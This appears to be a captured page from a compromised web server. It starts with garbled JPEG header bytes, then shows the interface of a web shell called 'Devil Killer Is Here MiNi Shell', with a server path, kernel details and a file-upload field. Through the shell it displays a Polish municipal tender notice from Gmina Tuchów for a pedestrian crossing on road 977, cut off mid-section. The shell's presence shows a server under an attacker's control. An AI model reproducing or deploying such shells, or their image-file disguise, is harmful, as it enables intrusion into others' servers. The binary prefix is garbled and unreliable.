JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240816/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240816/0045940301-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Budowa przejścia dla pieszych w ciągu drogi wojewódzkiej <br/>nr 977 w Siedliskach w odc. Ref.100 km 0+236,50-0+340,00 – branża drogowa” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA TUCHÓW</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 851661168</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Rynek 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Tuchów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">33-170</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL217 - Tarnowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">146525474</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">um@tuchow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.tuchow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Budowa przejścia dla pieszych w ciągu drogi wojewódzkiej <br/>nr 977 w Siedliskach w odc. Ref.100 km 0+236,50-0+340,00 – branża drogowa” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d90255f0-06a5-461a-ab0c-d25fb5f8b086</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00459403</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-08-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00047819/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.19 „Budowa przejścia dla pieszych w ciągu drogi wojewódzkiej nr 977 w Siedliskach w odc. Ref.100 km 0+236,50-0+340,00”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/tuchow <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu komunikacja Zamawiającego z Wykonawca odbywa się przy użyciu<br/>środków komunikacji elektronicznej, za pośrednictwem platformazakupowa.pl działając pod adresem: platformazakupowa.pl/pn/tuchow.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawcom informacje w formie<br/>elektronicznej za pośrednictwem platformazakupowa.pl. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany<br/>terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja, której<br/>zgodnie z obowiązującymi przepisami adresatem jest konkretny Wykonawca, będzie przekazywana w formie elektronicznej za<br/>pośrednictwem platformazakupowa.pl do konkretnego Wykonawcy. 2. Wykonawca jako podmiot profesjonalny ma obowiązek<br/>sprawdzania komunikatów i wiadomości bezpośrednio na platformazakupowa.pl przesłanych przez zamawiającego, gdyż system<br/>powiadomień może ulec awarii lub powiadomienie może trafić do folderu SPAM.3.Zamawiający, zgodnie z § 11 ust. 2<br/>Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz<br/>wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie zamieszcza wymagania dotyczące specyfikacji połączenia, formatu przesyłanych danych<br/>oraz szyfrowania i oznaczania czasu przekazania i odbioru danych za pośrednictwem platformazakupowa.pl, tj.:a) stały dostęp do<br/>sieci Internet ogwarantowanej przepustowości nie mniejszej niż 512 kb/s,b) komputer klasy PC lub MAC o następującej konfiguracji:<br/>pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os<br/>x 10 4, Linux, lub ich nowsze wersje, c) zainstalowana dowolna przeglądarka internetowa, w przypadku program Adobe Acrobat<br/>Reader lub inny obsługujący format plików .pdf, f)Platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej<br/>- kodowanie UTF8, g) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss)<br/>generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar. 4. Wykonawca, przystępując do<br/>niniejszego postępowania o udzielenie zamówienia publicznego: a) akceptuje warunki korzystania z platformazakupowa.pl określone<br/>w Regulaminie zamieszczonym na stronie internetowej pod linkiem w zakładce „Regulamin&#34; oraz uznaje go za wiążący, b) zapoznał i<br/>stosuje się do Instrukcji składania ofert/wniosków. 5. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób<br/>niezgodny z Instrukcją korzystania z platformazakupowa.pl, w szczególności za sytuację, gdy zamawiający zapozna się z treścią<br/>oferty przed upływem terminu składania ofert (np. złożenie oferty w zakładce „Wyślij wiadomość do Zamawiającego”. Taka oferta<br/>zostanie uznana przez Zamawiającego za ofertę handlową i nie będzie brana pod uwagę w przedmiotowym postępowaniu ponieważ<br/>nie został spełniony obowiązek narzucony w art. 221 Ustawy Prawo Zamówień Publicznych.6. Zamawiający informuje, że instrukcje<br/>korzystania z platformazakupowa.pl dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania<br/>ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu platforma zakupowa.pl znajdują się w zakładce<br/>„Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem: https:/platformazakupowa.pl/strona/45 instrukcje.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Realizując obowiązek prawny ciążący na administratorze, w szczególności mając na<br/>uwadze wymogi Rozporządzenia Parlamentu Europejskiego i Rady (UE)2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia<br/>dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych „RODO”), informujemy poniżej o zasadach przetwarzania Pani/Pana<br/>danych osobowych w Urzędzie Miejskim w Tuchowie w ww. celu oraz o przysługujących Pani/Panu prawach z tym związanych: 1.<br/>Administratorem Pani/Pana danych osobowych jest Gmina Tuchów, w imieniu której działa Burmistrz Tuchowa. Z Administratorem<br/>można się skontaktować poprzez adres e-mail: um@tuchow.pl lub pisemnie na adres siedziby Administratora: ul. Rynek 1, 33-170<br/>Tuchów. 2. Administrator wyznaczył inspektora ochrony danych, z którym może się Pani/Pan skontaktować poprzez e-mail:<br/>iod@tuchow.pl lub pisemnie na adres siedziby Administratora. Z inspektorem ochrony danych można się kontaktować we wszystkich<br/>sprawach dotyczących przetwarzania danych osobowych oraz korzystania z praw związanych z przetwarzaniem danych. 3.<br/>Pani/Pana dane osobowe przetwarzane są w celu związanym z postępowaniem o udzielenie zamówienia publicznego. 4.<br/>Administrator przetwarza Pani/Pana dane osobowe na podstawie obowiązujących przepisów prawa (art. 6 ust. 1 lit. c RODO), tj, w<br/>szczególności ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych. 5. Odbiorcami Pani/Pana danych osobowych będą<br/>osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o zapisy ustawy Pzp. 6. Pani/Pana dane<br/>osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o<br/>udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. 7.<br/>Posiada Pani/Pan: 7.1.na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;7.2. na podstawie<br/>art. 16 RODO prawo do sprostowania Pani/Pana danych przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>8. Nie przysługuje Pani/Panu: 8.1. w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osób.; 8.2. prawo do<br/>przenoszenia danych osobowych, o którym mowa w art. 20 RODO; 8.3. na podstawie art. 21 RODO prawo sprzeciwu, wobec<br/>przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>9. Przysługuje Pani/Panu również prawo wniesienia skargi do organu nadzorczego zajmującego się ochroną danych osobowych w<br/>państwie członkowskim Pani / Pana zwykłego pobytu, miejsca pracy lub Administratora miejsca popełnienia domniemanego<br/>naruszenia. 10. Pani/Pana dane osobowe zostały uzyskane przez bezpośrednio od Pani/Pana 11. Obowiązek podania przez<br/>Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy<br/>Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego;konsekwencje niepodania określonych danych<br/>wynikają z ustawy Pzp. 12. Nie planuje się przekazywania Pani/Pana danych osobowych do państw trzecich lub organizacji<br/>międzynarodowych. 13. Pani/Pana dane osobowe nie podlegają zautomatyzowanemu podejmowaniu decyzji, w tym profilowaniu.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z art. 19 ust. 2 i 3 ustawy z dnia 11września 2019r. Prawo zamówień<br/>publicznych Zamawiający informuje, że; 1. Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania<br/>lub uzupełnienia, o którym mowa w art.16 rozporządzenia 2016/679 - RODO, nie może skutkować zmianą wyniku postępowania o<br/>udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą. 2. W<br/>postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust.1<br/>rozporządzenia 2016/679 -RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP-271-21/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Budowa przejścia dla pieszych w ciągu drogi wojewódzkiej nr 977 w Siedliskach w odc. Ref.100 km 0+236,50-<br/>0+340,0 - branża drogowa:<br/>1. W ramch inwestycji zaprojektowano budowę lewostronnego chodnika w km 0+253,00 - 0+312,50, który będzie stanowił<br/>dojście do istniejącego peronu przystankowego, który należy wyremontować w km 0+236,50 - 0+253,00. Remontem objąć<br/>należy tez istniejący chodnik prawostronny przy istniejącej studni rewizyjnej w km 0+270,50. nawierzchnię chodników<br/>będzie stanowić 2. W zawiązku z planowaną lokalizacją przejścia zaplanowano przebudowę chodnika prawostronnego w<br/>rejonie wlotu drogi gminnej w km 0+310, 00 - 0+328,00.<br/>3. W km 0+315,00 przewidziano lokalizację przejścia dla pieszych. W celu zwiększenia orientacji przestrzennej oraz<br/>kierowania osób z dysfunkcjami wzroku do miejsca bezpiecznego przekraczania jezdni, przed przejściem dla pieszych<br/>zaprojektowano tzw. system fakturowych oznaczeń nawierzchni. W ramach inwestycji, w krawędzi chodnika i na szerokości<br/>linii P-10 należy wykonać pas ostrzegawczy z kostki integracyjnej (kostka betonowa półkolistymi wypustkami) o wymiarach<br/>0,60 m x 4,00 m. prostopadle do przejścia należy wykonać pas prowadzący o szerokości 0,20 m, a na jego końcu wykonać<br/>pole uwagi o wymiarach 0,40 m x 0,40 m.<br/>4. Z uwagi na spękania w obrębie krawędzi lewego pasa ruchu, zaprojektowano remont jezdni drogi wojewódzkiej w km<br/>0+253,00 - 0+317,00 polegający na rozebraniu nawierzchni wraz z podbudową w obrębie spękanej krawędzi jezdni<br/>(frezowanie na szerokości 1m ) od krawędzi i rozbiórka podbudowy na szerokości 0,50m od krawędzi), a następnie na<br/>ułożeniu nowych warstw konstrukcyjne i nawierzchniowe jezdni.<br/>5. Na wniosek zarządcy drogi rozszerzono zakres inwestycji i przebudową objęto istniejący zjazd publiczny na działkę nr<br/>951/1 w km 0+327,70.<br/>6. Na zjeździe zaprojektowano wyspę kanalizującą ruchu i ograniczająca funkcjonowanie zjazdu jedynie do relacji<br/>prawoskrętnych.<br/>7. Rozwiązanie wysokościowe: Wysokościowy przebieg chodnika wynika z istniejącego ukształtowania drogi wojewódzkiej.<br/>Pochylenia podłużne chodnika zawierają się granicach dopuszczonych przepisami i wynoszą od 0,10% do 0,60%.<br/>Pochylenie podłużne zjazdu publicznego nie przekracza 5%.<br/>8. Przekroje poprzeczne: Na odcinku poszerzenia pasa ruchu zaplanowano rozbiórkę fragmentu nawierzchni wraz z<br/>podbudową w obrębie krawędzi jezdni, a następnie wykonanie nowych warstw konstrukcyjnych i nawierzchniowych.<br/>9. Projektowany chodnik posiada pochylenie poprzeczne 2% w kierunku jezdni drogi.<br/>10. W krawędzi drogi zastosowano krawężniki betonowe wibroprasowane o wymiarach 20x30cm o zasadniczym odsłonięciu<br/>12 cm. W rejonie przejścia dla pieszych oraz odcinków końcowych i początkowych chodnika krawężniki będą obniżone o<br/>odsłonięciu 2 cm. Krawężniki należy ustawić na ławie betonowej z oporem z betonu C12/15. Od strony terenu chodnik<br/>obramowany został obrzeżem betonowym 8x30cm układanym na ławie z oporem z betonu C12/15. Typowe odsłonięcie<br/>obrzeży wynosi 5cm.<br/>11. Przy krawężniku zaprojektowano wykonanie ścieku przy krawężnikowego o szerokości 0,20m (z dwóch rzędów kostki).<br/>Bezpośrednio przy ścieku należy ustawić krawężniki betonowe 20x30. 12. Wykonawca odpowiedzialny jest za opracowanie i uzyskanie uzgodnienia przez właściwe organy projektu tymczasowej<br/>organizacji ruchu drogowego na czas trwania robót budowlanych wraz z wykonaniem oznakowania.<br/>13. Szczegółowy przedmiot zamówienia oraz sposób realizacji zamówienia został określony w załącznikach do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233300-2 - Fundamentowanie autostrad, dróg, ulic i ścieżek ruchu pieszego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45233290-8 - Instalowanie znaków drogowych</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocenie będą podlegały oferty ważne tj. oferty niepodlegające odrzuceniu. Oferty oceniane będą na<br/>podstawie następujących kryteriów:<br/>1. cena – waga 60%<br/>2. okres gwarancji – waga 40 %</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1.1. zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>1.2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>1.3. sytuacji ekonomicznej lub finansowej: Zamawiający nie stawia warunku w powyższym zakresie.<br/>1.4. zdolności technicznej lub zawodowej:<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że: 1.4.1. wykonał w okresie ostatnich 5 lat licząc od dnia, w którym upływa termin składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie co najmniej jedną robotę budowlaną (umowę), której zakres<br/>obejmował roboty podobne do przedmiotu zamówienia tj. m. in. przebudowę/budowę/remont/rozbudowę chodnika o wartości<br/>nie mniejszej niż 50 000,00 zł.<br/>UWAGA! Wartości podane w dokumentach w walucie innej niż złoty polski, Wykonawca przeliczy na zł według średniego<br/>kursu NBP na dzień publikacji ogłoszenia o zamówieniu. w przypadku, gdy w dniu publikacji ogłoszenia NBP nie opublikował<br/>średnich kursów walut, należy przyjąć pierwszy opublikowany po tej dacie średni kurs NBP. 1.4.2. dysponuje lub dysponować będzie do realizacji zamówienia co najmniej 1 osobą posiadającą uprawnienia budowalne z minimum 3 letnim doświadczeniem zawodowym - kierownika budowy w kierowaniu robotami w specjalności drogowej. 1.4.3. Zamawiający, określając wymogi dla osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza<br/>odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz<br/>odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji<br/>Szwajcarskiej na zasadach określonych w art. 12 a oraz innych przepisów ustawy Prawo budowlane (t. j. Dz. U. z 2021 r.<br/>poz. 2351) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii<br/>Europejskiej (t. j. Dz. U. z 2020 r. poz. 220).<br/>Zamawiający wymaga, aby wykonawca dysponował ww. kadrą techniczną przez cały okres realizacji przedmiotu<br/>zamówienia.<br/>1.4.4. Zamawiający nie precyzuje sprzętu, jednakże przedmiot zamówienia winien być wykonany zgodnie z zapisami specyfikacji technicznej wykonania i odbioru robót budowlanych stanowiącym załącznik nr 8 do SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na 